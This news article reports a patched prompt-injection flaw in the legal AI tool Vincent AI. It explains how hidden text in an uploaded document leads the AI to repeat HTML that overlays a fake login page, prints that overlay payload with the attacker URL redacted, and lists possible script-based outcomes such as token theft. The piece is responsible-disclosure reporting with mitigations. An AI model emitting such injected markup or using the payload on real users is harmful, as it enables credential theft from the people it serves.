Screen Takeover Flaw in $1B Legal AI Tool Exposes Law Firms to Prompt Injection Attacks

Researchers have discovered critical vulnerabilities in Vincent AI, a legal research tool recently acquired for $1 billion, that could allow attackers to execute prompt injection attacks leading to screen takeovers and remote code execution. The flaw, now patched, highlights growing security concerns in AI systems processing untrusted documents.

Article illustration 1

Vincent AI, developed by vLex and used by thousands of legal teams including eight of the top ten global law firms, was acquired last month by Clio for $1 billion. The vulnerabilities discovered in the platform exposed users to significant risks through a sophisticated attack chain that exploited how the AI processes and outputs information from uploaded documents.

The Attack Chain: From Document to Takeover

The vulnerability centers on how Vincent AI processes uploaded documents containing hidden prompt injections. Researchers demonstrated that a carefully crafted document could manipulate the AI into executing code that would overlay a malicious login screen on top of the legitimate interface.

Article illustration 3

The attack unfolds in three steps:

  1. Malicious Document Upload: A user uploads an untrusted document, such as a legal case study found online, which contains a prompt injection hidden in white-on-white text. This injection appears as a fake witness quote containing HTML code designed to create a full-screen overlay.

  2. AI Processing and Response: When the user asks Vincent AI to analyze the document, the AI extracts what it identifies as "direct quotes" - including the attacker's hidden quote. The AI then responds by repeating these quotes, inadvertently executing the malicious HTML code.

  3. Screen Takeover: The HTML code, when rendered in the user's browser, creates a full-screen overlay that loads an attacker-controlled website designed to mimic the vLex login screen. Any credentials entered into this fake login are captured by the attacker.

Article illustration 2

The prompt injection text used in the attack contained the following HTML snippet:

<div style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: 2147483647 !important; background: white; pointer-events: auto;">
<object data="https://<ATTACKER URL REDACTED>/login" type="text/html" style="width: 100%; height: 100%; border: none;"></object>
</div>

This code creates a fixed-position div that covers the entire viewport, effectively overlaying the legitimate interface with the attacker's content.

Article illustration 4

Beyond Phishing: Remote Code Execution Risks

During testing, researchers noted that the vulnerability extended beyond simple screen overlays. The model's outputs could execute JavaScript code stored in Markdown hyperlinks or HTML elements, significantly expanding the attack surface.

This elevated the risk from phishing to remote code execution, with potentially devastating consequences for law firms handling sensitive client data. Malicious JavaScript payloads could be persisted in chat histories, executing each time a chat was opened. Attackers could have achieved:

  • Zero-click data exfiltration
  • Forced file downloads
  • Cryptocurrency mining
  • Session token theft, enabling attackers to take actions on behalf of users

Given that Vincent AI is used by top global law firms, the potential exposure of sensitive client data and attorney-client privileged information represents a severe security and ethical breach.

Mitigation Strategies for Organizations

Following the responsible disclosure, vLex implemented fixes to address these vulnerabilities. However, organizations using the platform can further reduce their risk by implementing additional security measures:

  1. Restrict Collection Visibility: Ensure that any Collections containing potentially untrusted documents are configured with visibility set to "Only for individuals authorised" rather than "For all organization."

  2. Limit Document Sources: Prohibit users from uploading documents from unverified sources on the internet, particularly those found through public web searches.

  3. Implement Content Validation: Add validation layers to detect and block suspicious content in uploaded documents before they are processed by the AI.

These measures help create a defense-in-depth approach, reducing the likelihood that malicious content will reach the AI system in the first place.

Responsible Disclosure and Remediation

The vulnerabilities were responsibly disclosed to vLex, which took "fast and effective action" in implementing the researchers' remediation recommendations. This collaborative approach highlights the importance of security researchers and vendors working together to address emerging threats in AI systems.

As AI becomes increasingly integrated into critical business processes, especially in sensitive fields like legal services, the security of these systems becomes paramount. The Vincent AI vulnerability serves as a stark reminder that AI models can be manipulated through novel attack vectors that traditional security measures may not adequately address.

The legal industry's adoption of AI tools presents both opportunities and risks. While these technologies can significantly enhance research capabilities and efficiency, they must be implemented with robust security considerations to protect sensitive client information and maintain attorney-client privilege.

Source: PromptArmor Security Research